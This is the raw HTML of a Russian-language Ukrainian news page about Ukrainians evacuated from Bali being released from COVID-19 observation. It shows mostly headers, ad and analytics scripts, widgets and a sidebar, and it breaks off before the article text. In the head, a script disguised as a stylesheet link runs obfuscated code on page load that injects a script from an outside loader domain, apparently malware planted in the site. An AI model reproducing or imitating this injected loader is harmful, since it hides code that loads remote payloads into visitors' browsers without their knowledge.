<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Украинцы, которых эвакуировали с Бали, разъехались по домам | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Украинцы, которых эвакуировали с Бали, разъехались по домам "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/img/ielogo.jpg"/><meta property="og:type" content="website" /><meta property="og:image:width" content="200" /><meta property="og:image:height" content="200" /><meta property="og:type" content="article" /><meta property="og:image:alt" content="Экономические новости Украины и мира" /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Украинцев, которые 30 марта вернулись в Украину двумя рейсами из Дохи в разгар коронавиурса в мире, отпустили с обсервации домой, предварительно проведя тестирование методом ПЦР на наличие COVID-19." /><meta property="og:description" content="Украинцев, которые 30 марта вернулись в Украину двумя рейсами из Дохи в разгар коронавиурса в мире, отпустили с обсервации домой, предварительно проведя тестирование методом ПЦР на наличие COVID-19." /><meta name="keywords" content="бвли,доха,коронавирус,украинцы,эвакуация,здоровье,эксклюзивные новости" /><link rel="canonical" href="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam" /><meta property="og:url" content="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4800370';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4800370&amp;a=9368" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: 'f1971219-dfb6-45c1-a362-6879325bc045', ph: 'admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9', sender: 'admixer'});globalAml.singleRequest("admixer");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>27.90</td><td>27.18</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>30.20</td><td>29.12</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.36</td><td>0.28</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>504.50</td><td>0.00</td><td>20:05 03.04.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1420.10</td><td>0.00</td><td>17:00 03.04.20</td> </tr> <tr> <td>RTS</td><td>1049.88</td><td>0.00</td><td>18:51 03.04.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>34.11</td><td>+16.71</td><td style="text-transform:uppercase;">Apr</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>29.00</td><td>+14.53</td><td style="text-transform:uppercase;">Apr</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>304.00</td><td>+7.33</td><td style="text-transform:uppercase;">Apr</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li class="current-menu-item"><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_economy/full/404-klichko-podschital-skolko-lyudi-smogut-eshhe-prosidet-na-karantine-za-svoj-schyot" title="Кличко подсчитал, сколько люди смогут еще просидеть на карантине за свой счёт"><img width="210" height="156" alt="Кличко подсчитал, сколько люди смогут еще просидеть на карантине за свой счёт" src="https://enovosty.com/wp-content/uploads/2020/04/klichko.jpg"></a><a href="https://enovosty.com/news_economy/full/404-klichko-podschital-skolko-lyudi-smogut-eshhe-prosidet-na-karantine-za-svoj-schyot" title="Кличко подсчитал, сколько люди смогут еще просидеть на карантине за свой счёт" class="name">Кличко подсчитал, сколько люди смогут еще просидеть на карантине за свой счёт <span>(3009)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/404-vremya-komfortnogo-sideniya-na-neftyanoj-igle-zakonchilos-dlya-vsex-eksperty" title="Время комфортного сидения на «нефтяной игле» закончилось для всех - эксперты"><img width="210" height="156" alt="Время комфортного сидения на «нефтяной игле» закончилось для всех - эксперты" src="https://enovosty.com/wp-content/uploads/2020/04/4eb0f86c6b900ec4414aae14d2b5f333.jpeg"></a><a href="https://enovosty.com/news_abroad/full/404-vremya-komfortnogo-sideniya-na-neftyanoj-igle-zakonchilos-dlya-vsex-eksperty" title="Время комфортного сидения на «нефтяной игле» закончилось для всех - эксперты" class="name">Время комфортного сидения на «нефтяной игле» закончилось для всех - эксперты <span>(2986)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/404-kiev-zapustil-mobilnye-brigady-kotorye-delayut-testy-na-koronavirus-doma" title="Киев запустил мобильные бригады, которые делают тесты на коронавирус дома"><img width="210" height="156" alt="Киев запустил мобильные бригады, которые делают тесты на коронавирус дома" src="https://enovosty.com/wp-content/uploads/2020/04/405933_res_0-e1586001190239.jpeg"></a><a href="https://enovosty.com/news_kiev/full/404-kiev-zapustil-mobilnye-brigady-kotorye-delayut-testy-na-koronavirus-doma" title="Киев запустил мобильные бригады, которые делают тесты на коронавирус дома" class="name">Киев запустил мобильные бригады, которые делают тесты на коронавирус дома <span>(1068)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/zdorove/full/304-ukraina-ozhidaet-postavku-lekarstva-ot-covid-19" title="Украина ожидает поставку лекарства от COVID-19"><img width="210" height="156" alt="Украина ожидает поставку лекарства от COVID-19" src="https://enovosty.com/wp-content/uploads/2020/04/lekarstva-koronavirus-1.jpg"></a><a href="https://enovosty.com/zdorove/full/304-ukraina-ozhidaet-postavku-lekarstva-ot-covid-19" title="Украина ожидает поставку лекарства от COVID-19" class="name">Украина ожидает поставку лекарства от COVID-19 <span>(6212)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_politics/full/304-xoroshie-novosti-v-ukraine-ispytali-moshhnejshij-raketnyj-kompleks-dlya-vsu-foto-video" title="Хорошие новости: В Украине испытали мощнейший ракетный комплекс для ВСУ (ФОТО, ВИДЕО)"><img width="210" height="156" alt="Хорошие новости: В Украине испытали мощнейший ракетный комплекс для ВСУ (ФОТО, ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/04/neptun.jpg"></a><a href="https://enovosty.com/news_politics/full/304-xoroshie-novosti-v-ukraine-ispytali-moshhnejshij-raketnyj-kompleks-dlya-vsu-foto-video" title="Хорошие новости: В Украине испытали мощнейший ракетный комплекс для ВСУ (ФОТО, ВИДЕО)" class="name">Хорошие новости: В Украине испытали мощнейший ракетный комплекс для ВСУ (ФОТО, ВИДЕО) <span>(7284)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_politics/full/304-v-ukraine-stanet-menshe-generalov-v-chyom-sut" title="В Украине станет меньше генералов. В чём суть?"><img width="210" height="156" alt="В Украине станет меньше генералов. В чём суть?" src="https://enovosty.com/wp-content/uploads/2020/04/homchak.jpg"></a><a href="https://enovosty.com/news_politics/full/304-v-ukraine-stanet-menshe-generalov-v-chyom-sut" title="В Украине станет меньше генералов. В чём суть?" class="name">В Украине станет меньше генералов. В чём суть? <span>(4292)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a 